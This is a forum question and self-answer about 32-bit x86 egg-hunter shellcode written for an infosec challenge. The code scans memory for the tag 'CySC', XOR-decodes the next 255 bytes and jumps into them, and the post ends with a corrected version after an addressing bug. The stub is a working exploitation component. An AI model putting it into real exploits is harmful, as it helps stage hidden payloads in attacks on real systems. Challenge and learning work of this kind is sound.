I'm writing shellcode to solve a infosec challenge that requires to first find an egg in memory "CySC", then xor the proceeding 255 bytes after the memory address of the egg tag, using the last byte of the memory address of the egg tag. This is what I have come up with so far, but I'm getting the above error for line 19 which is the 'xor [eax+bl],cl' instruction.
BITS 32
start:
mov eax, 0xb7469FFF ;this is one byte before the start of where the code "CySC" can be found
mov ebx, 'CySC' ;obvious.
compare:
inc eax ;move to the next byte, which is the start of the range where "CySC" can be found
cmp [eax], ebx ;does the data located at eax equal "CySC" ?
jne compare ;Loop if not, increment eax by one and check next mem add
foundit:
xor ecx, ecx ;zero out ecx to store the last byte of eax's mem address where "CySC" is located. Remember this is what we will xor the rest of the shellcode with.
mov cl, al ;move the last byte of eax into cl
xor ebx, ebx ;zero out ebx for use as a counter in the next loop
deobfuscate:
dec bl ;subtract 1 from bl, the first loop will be 255 (ff)
xor [eax+bl],cl ;look at what is located at eax+bl (eax+255 first loop)
cmp [bl], 4 ;is bl counter equal to 4?
jne deobfuscate ;if it is continue, if not loop
runshellcode:
add eax, 4 ;add 4 to x as this is our egg tag "CySC"
call eax ;execute shellcode at eax
Any suggestions would be much appreciated!
The problem was in "xor [eax+bl],al", because the [] brackets denote that everything within will be a pointer to the value located at the memory address... so bl = 0xFF in the first loop, obviously an invalid mem address. So I just changed it to "xor [eax+ebx],al" to pull the value located at ebx, and it worked. Got my flag! Thanks for the help.
BITS 32
start:
mov eax, 0xb7469FFF
mov ebx, 'CySC'
compare:
inc eax
cmp [eax], ebx
jne compare
foundit:
xor ecx, ecx
mov cl, al
xor ebx, ebx
deobfuscate:
dec bl
xor [eax+ebx],al
cmp bl, 0x4
jne deobfuscate
execute:
add eax, 4
call eax